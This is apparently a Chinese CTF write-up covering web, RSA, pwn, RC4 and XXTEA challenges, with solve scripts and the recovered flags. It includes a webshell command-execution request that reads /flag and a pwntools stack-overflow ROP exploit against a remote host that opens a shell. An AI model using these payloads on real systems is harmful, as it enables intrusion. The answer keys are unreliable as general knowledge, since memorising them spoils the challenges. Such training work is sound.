爬虫协议

/robot.txt
2024-04-30T134445
第三个参数有flag
2024-04-30T134500
2024-04-30T134522

packet

搜索flag
2024-04-30T134540
GET /shell.php?1337=system(%27cat%20/flag%20|base64%20-w%200%27);
跟踪一下返回包
2024-04-30T134551
base64梭一下
flag{7d6f17a4-2b0a-467d-8a42-66750368c249}

cc

Cyberchef一把梭
2024-04-30T134904

Theoreom

直接分解n
2024-04-30T135248

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from Crypto.Util.number import *  
from gmpy2 import *  
  
n = 94581028682900113123648734937784634645486813867065294159875516514520556881461611966096883566806571691879115766917833117123695776131443081658364855087575006641022211136751071900710589699171982563753011439999297865781908255529833932820965169382130385236359802696280004495552191520878864368741633686036192501791  
d1 = 4218387668018915625720266396593862419917073471510522718205354605765842130260156168132376152403329034145938741283222306099114824746204800218811277063324566  
d2 = 9600627113582853774131075212313403348273644858279673841760714353580493485117716382652419880115319186763984899736188607228846934836782353387850747253170850  
  
c = 36423517465893675519815622861961872192784685202298519340922692662559402449554596309518386263035128551037586034375613936036935256444185038640625700728791201299960866688949056632874866621825012134973285965672502404517179243752689740766636653543223559495428281042737266438408338914031484466542505299050233075829  
e = 65537  
  
p = 9725277820345294029015692786209306694836079927617586357442724339468673996231042839233529246844794558371350733017150605931603344334330882328076640690156923  
q = 9725277820345294029015692786209306694836079927617586357442724339468673996231042839233529246844794558371350733017150605931603344334330882328076640690156717  
phi = (p - 1) * (q - 1)  
d = inverse(e, phi)  
m = pow(c, d, n)  
  
print(long_to_bytes(m))

b'flag{5f00e1b9-2933-42ad-b4e1-069f6aa98e9a}'

fd

简单的栈溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
from ctypes import *
from struct import pack
import numpy as np
from math import log
banary = "./pwn"
elf = ELF(banary)
ip = '47.93.142.240'
port = 25839
local = 0
if local:
    io = process(banary)
else:
    io = remote(ip, port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

def debug(a=''):
    if a != '':
        gdb.attach(io, a)
        pause()
    else:
        gdb.attach(io)
        pause()
sys_addr = 0x400778
pop_rdi = 0x400933
info = 0x601090
io.recvline()
io.sendline(b'$0'.ljust(8,b'\x00'))
io.recvline()
payload = b'a'*0x28 + p64(pop_rdi) + p64(info) + p64(sys_addr)
io.sendline(payload)
io.interactive()

2024-04-30T134610

rc4

ida打开,看到密文和密钥
直接rc4

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from Crypto.Cipher import ARC4
key = b'gamelab@'  
v5 = [0] * 42
v5[0] = 0xB6
v5[1] = 0x42
v5[2] = 0xB7
v5[3] = 0xFC
v5[4] = 0xF0
v5[5] = 0xA2
v5[6] = 0x5E
v5[7] = 0xA9
v5[8] = 0x3D
v5[9] = 0x29
v5[10] = 0x36
v5[11] = 0x1F
v5[12] = 0x54
v5[13] = 0x29
v5[14] = 0x72
v5[15] = 0xA8
v5[16] = 0x63
v5[17] = 0x32
v5[18] = 0xF2
v5[19] = 0x44
v5[20] = 0x8B
v5[21] = 0x85
v5[22] = 0xEC
v5[23] = 0xD
v5[24] = 0xAD
v5[25] = 0x3F
v5[26] = 0x93
v5[27] = 0xA3
v5[28] = 0x92
v5[29] = 0x74
v5[30] = 0x81
v5[31] = 0x65
v5[32] = 0x69
v5[33] = 0xEC
v5[34] = 0xE4
v5[35] = 0x39
v5[36] = 0x85
v5[37] = 0xA9
v5[38] = 0xCA
v5[39] = 0xAF
v5[40] = 0xB2
v5[41] = 0xC6
rc4 = ARC4.new(key)
v6 = rc4.decrypt(bytes(v5)).decode()
print(v6)

flag{12601b2b-2f1e-468a-ae43-92391ff76ef3}

欢乐时光

xxtea加密
2024-04-30T134622
delta = 0x61C88647
写脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define DELTA 0x61C88647
#define MX (z >> 5 ^ y << 2) + (y >> 3 ^ z << 4) ^ (sum ^ y) + (k[((p & 3) ^ e)] ^ z)

void xxtea_encrypt(uint32_t *v, uint32_t len, uint32_t *k) {
    uint32_t n = len - 1;
    uint32_t y, z, sum = 0, e, p, q;
    q = 415 / len + 114;
    while (q-- > 0) {
        sum += DELTA;
        e = sum >> 2 & 3;
        for (p = 0; p < n; p++) {
            y = v[p + 1];
            z = v[p] += MX;
        }
        y = v[0];
        z = v[n] += MX;
    }
}

void xxtea_decrypt(uint32_t *v, uint32_t len, uint32_t *k) {
    uint32_t n = len - 1;
    uint32_t y, z, sum, e, p, q;
    q = 415 / len + 114;
    sum = -q * DELTA;
    y = v[0];
    while (sum != 0) {
        e = (sum >> 2) & 3;
        for (p = n; p > 0; p--) {
            z = v[p - 1];
            y = v[p] -= MX;
        }
        z = v[n];
        y = v[0] -= MX;
        sum += DELTA;
    }
}

int main() {
    uint32_t v[11] = {0x480AC20C,0xCE9037F2,0x8C212018,0xE92A18D,0xA4035274,0x2473AAB1,0xA9EFDB58,0xA52CC5C8,0xE432CB51,0xD04E9223,0x6FD07093};
    uint32_t key[16]= {0x79696755,0x67346F6C,0x69231231,0x5F674231};
    xxtea_decrypt(v, 11, key);  
    printf("%s", (char *)v);
    return 0;
}
//flag{efccf8f0-0c97-12ec-82e0-0c9d9242e335}